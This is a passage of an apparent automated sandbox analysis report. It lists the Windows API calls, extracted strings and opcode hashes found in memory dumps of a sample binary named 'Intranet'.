                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: 77f30c94d94c0f458413f581fce9ead5a6b36d07238d87dc83474fa08fdc5f79
                                                                            • Instruction ID: ded5761890f2b4ce8c10b785b8e811df71722749b4f0aaded8d3dea8c33695f5
                                                                            • Opcode Fuzzy Hash: 77f30c94d94c0f458413f581fce9ead5a6b36d07238d87dc83474fa08fdc5f79
                                                                            • Instruction Fuzzy Hash: D1517C711043049FD700EF21C8A19AEBBF4FF98758F50491EF896572A1DB35AE09CB92
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0050A852
                                                                            • __swprintf.LIBCMT ref: 0050A874
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0050A8B1
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0050A8D6
                                                                            • _memset.LIBCMT ref: 0050A8F5
                                                                            • _wcsncpy.LIBCMT ref: 0050A931
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0050A966
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0050A971
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0050A97A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0050A984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: e0e25bb24fb13494a7b72f60a55ca31f34936c74dfa0d012aecaf7c18017bac3
                                                                            • Instruction ID: 6ed8ea43ec44bdbcc630e54213ba17eb996cd6225d2ec0eb33b0f28ec2542890
                                                                            • Opcode Fuzzy Hash: e0e25bb24fb13494a7b72f60a55ca31f34936c74dfa0d012aecaf7c18017bac3
                                                                            • Instruction Fuzzy Hash: 9E31A17650021AABDB219FA1DC49FEF77BCFF88701F1045AAF908D21A4E7749648CB25
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0052982C,?,?), ref: 0052C0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0052C100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0052C118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C130
                                                                            • #418.OLEAUT32(?,00000000,00000000,00533C7C,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0052C159
                                                                            • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1A8
                                                                            • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 2779716855-0
                                                                            • Opcode ID: ca682e4ed39ffc2425a657bd7208e67510b14b2ecb2a5b2adf8b3f58e3fba39f
                                                                            • Instruction ID: c83cc6ec1bb29047cdcbb4c1a9655ac37570d6348e8daba88a5151399aab477e
                                                                            • Opcode Fuzzy Hash: ca682e4ed39ffc2425a657bd7208e67510b14b2ecb2a5b2adf8b3f58e3fba39f
                                                                            • Instruction Fuzzy Hash: 7B412875500218AFCB119F64DC8CEAE7FB8FF9A711F104058F905E72A1D7309945EB60
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0050E053
                                                                            • _wcscat.LIBCMT ref: 0050E06B
                                                                            • _wcscat.LIBCMT ref: 0050E07D
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0050E092
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E0A6
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0050E0BE
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0050E0D8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E0EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: 2ff8d422fe5834223cb840bdef4bff042b5e557e34caeab429444c47df081da6
                                                                            • Instruction ID: b5533e8bac98f3da9d807f273174506f76225f81318a54be0a731c232ecde425
                                                                            • Opcode Fuzzy Hash: 2ff8d422fe5834223cb840bdef4bff042b5e557e34caeab429444c47df081da6
                                                                            • Instruction Fuzzy Hash: 9A8190715043469FC724DFA4C84596EBBE8BF99314F148C2EF886C7290E774E944CB62
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000,00000000,?), ref: 0052C8A4
                                                                            • GetFocus.USER32(?,?,?,?), ref: 0052C8B4
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0052C8BF
                                                                            • _memset.LIBCMT ref: 0052C9EA
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0052CA15
                                                                            • GetMenuItemCount.USER32(?), ref: 0052CA35
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0052CA48
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0052CA7C
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0052CAC4
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0052CAFC
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0052CB31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: eec024e939f98e77bb650a7f2230c6017dbea23c44f00765b263bd926ddd3001
                                                                            • Instruction ID: 60358443bad21140961690284d17691f94de7f44e25e0805667167d5d20bf712
                                                                            • Opcode Fuzzy Hash: eec024e939f98e77bb650a7f2230c6017dbea23c44f00765b263bd926ddd3001
                                                                            • Instruction Fuzzy Hash: 6D819970208325AFD710CF14E885A6EBFE8FF8A754F00492EF98593292C770D905DBA2
                                                                            APIs
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                              • Part of subcall function 004F8E20: GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                              • Part of subcall function 004F8E20: GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                              • Part of subcall function 004F8E20: HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                              • Part of subcall function 004F8EBD: GetProcessHeap.KERNEL32(00000008,004F8916,00000000,00000000,?,004F8916,?), ref: 004F8EC9
                                                                              • Part of subcall function 004F8EBD: HeapAlloc.KERNEL32(00000000,?,004F8916,?), ref: 004F8ED0
                                                                              • Part of subcall function 004F8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004F8916,?), ref: 004F8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F8B2E
                                                                            • _memset.LIBCMT ref: 004F8B43
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F8B62
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8B73
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004F8BB0
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F8BCC
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8BE9
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004F8BF8
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F8BFF
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F8C20
                                                                            • CopySid.ADVAPI32(00000000), ref: 004F8C27
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F8C58
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F8C7E
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F8C92
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 10d835ae582c06a92f44608e6895ff2bc376f636f4df635ae527e80a4c621959
                                                                            • Instruction ID: 17e011d518dba6241605905b5da5b66838c4d159044cf56e15c654668d989efc
                                                                            • Opcode Fuzzy Hash: 10d835ae582c06a92f44608e6895ff2bc376f636f4df635ae527e80a4c621959
                                                                            • Instruction Fuzzy Hash: DE615A7190020DAFDF149F91DC89EBEBB79FF14304F04815EFA15AA290DB399A05DB64
                                                                            APIs
                                                                            • GetDC.USER32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,005160F0), ref: 00517A79
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?), ref: 00517A85
                                                                            • CreateCompatibleDC.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?,?,00000006), ref: 00517A91
                                                                            • SelectObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,005160F0,?,?), ref: 00517A9E
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00517AF2
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00517B2E
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00517B52
                                                                            • SelectObject.GDI32(00000006,?), ref: 00517B5A
                                                                            • DeleteObject.GDI32(?), ref: 00517B63
                                                                            • DeleteDC.GDI32(00000006), ref: 00517B6A
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00517B75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: ce65b781847bb22c4fcdcc6ff030fb50ac8305e0ec506fe5fbd72b07d943148a
                                                                            • Instruction ID: be069b38a0e3bc6539b008ab27455b6004c4ea815756dec348724f35fbc2c422
                                                                            • Opcode Fuzzy Hash: ce65b781847bb22c4fcdcc6ff030fb50ac8305e0ec506fe5fbd72b07d943148a
                                                                            • Instruction Fuzzy Hash: 66512775904309EFDB14CFA9CC89EAEBBB9FF48310F14841EE95AA7250D731A945CB60
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?,?,00530990,?,004E30B6,00000085,?), ref: 0050A4D4
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • LoadStringW.USER32(?,?,00000FFF,?,?,004E30B6,00000085,?), ref: 0050A4F6
                                                                            • __swprintf.LIBCMT ref: 0050A54F
                                                                            • __swprintf.LIBCMT ref: 0050A568
                                                                            • _wprintf.LIBCMT ref: 0050A61E
                                                                            • _wprintf.LIBCMT ref: 0050A63C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-2391861430
                                                                            • Opcode ID: 3bf74f78c344fa3c71432cdf1b1d5fceee36ab99ecd3f13eace014cfa4d05ae1
                                                                            • Instruction ID: 04d5722bc757be7724dadf86049ee7d7ac6d93f53e470e148aba442e9b88bcfd
                                                                            • Opcode Fuzzy Hash: 3bf74f78c344fa3c71432cdf1b1d5fceee36ab99ecd3f13eace014cfa4d05ae1
                                                                            • Instruction Fuzzy Hash: 8B51C271800209ABCF15EBE1CD66EEEBB78BF18348F50016AF405720A1EB352F58DB65
                                                                            APIs
                                                                              • Part of subcall function 0050951A: __time64.LIBCMT ref: 00509524
                                                                              • Part of subcall function 004B4A8C: _fseek.LIBCMT ref: 004B4AA4
                                                                            • __wsplitpath.LIBCMT ref: 005097EF
                                                                              • Part of subcall function 004C431E: __wsplitpath_helper.LIBCMT ref: 004C435E
                                                                            • _wcscpy.LIBCMT ref: 00509802
                                                                            • _wcscat.LIBCMT ref: 00509815
                                                                            • __wsplitpath.LIBCMT ref: 0050983A
                                                                            • _wcscat.LIBCMT ref: 00509850
                                                                            • _wcscat.LIBCMT ref: 00509863
                                                                              • Part of subcall function 00509560: _memmove.LIBCMT ref: 00509599
                                                                              • Part of subcall function 00509560: _memmove.LIBCMT ref: 005095A8
                                                                            • _wcscmp.LIBCMT ref: 005097AA
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DE1
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DF4
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00509A0D
                                                                            • _wcsncpy.LIBCMT ref: 00509A80
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00509AB6
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00509ACC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00509ADD
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00509AEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 5f34e34503d6b830e68dcd58517c7d5e21af54bef89fc7fd5b499ea435adda9b
                                                                            • Instruction ID: d9edcc7d0e789e635230ba24b2418a3c76b1b0e1d10514ada0f1aee1f620eab6
                                                                            • Opcode Fuzzy Hash: 5f34e34503d6b830e68dcd58517c7d5e21af54bef89fc7fd5b499ea435adda9b
                                                                            • Instruction Fuzzy Hash: 05C13EB1D00219AADF11DF95CC85EDEBBBDAF84304F0040AAF609E6156EB749A848F65
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004B5BF1
                                                                            • GetMenuItemCount.USER32(00567890,?,?), ref: 004F0E7B
                                                                            • GetMenuItemCount.USER32(00567890), ref: 004F0F2B
                                                                            • GetCursorPos.USER32(?), ref: 004F0F6F
                                                                            • SetForegroundWindow.USER32(00000000), ref: 004F0F78
                                                                            • TrackPopupMenuEx.USER32(00567890,00000000,?,00000000,00000000,00000000), ref: 004F0F8B
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004F0F97
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2751501086-0
                                                                            • Opcode ID: cdffb9c4f40c0aebe56835cda8b52e91ec6685107a28dff1d135cabb9ea10610
                                                                            • Instruction ID: 37772fcad0a8e164859fefb4cad871a542cef917f4c4306ed33c425905e5336d
                                                                            • Opcode Fuzzy Hash: cdffb9c4f40c0aebe56835cda8b52e91ec6685107a28dff1d135cabb9ea10610
                                                                            • Instruction Fuzzy Hash: 3171E030604709BEEB219B54DC89FAAFF65FB44364F100217F618A62D2C7B56860DBA9
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00530980), ref: 0050AF4E
                                                                            • GetDriveTypeW.KERNEL32(00000061,0055B5F0,00000061), ref: 0050B018
                                                                            • _wcscpy.LIBCMT ref: 0050B042
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: L,S$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1244258893
                                                                            • Opcode ID: 5c5d93b59825cd24e3a48a8404b13457278dcd90acaad753f5e77b4499ed6bee
                                                                            • Instruction ID: 0845d20c40d3bc12ef1702dd22f326a662e2b4017ff4e9575f7d8a114c909d46
                                                                            • Opcode Fuzzy Hash: 5c5d93b59825cd24e3a48a8404b13457278dcd90acaad753f5e77b4499ed6bee
                                                                            • Instruction Fuzzy Hash: 4C51D0741183059FD314EF15C8A1AAEBBA5FF94318F50481EF896872E2EB70AD09CA52
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _memset.LIBCMT ref: 004F8489
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 004F84BE
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F84DA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004F84F6
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004F8520
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004F8548
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F8553
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F8558
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
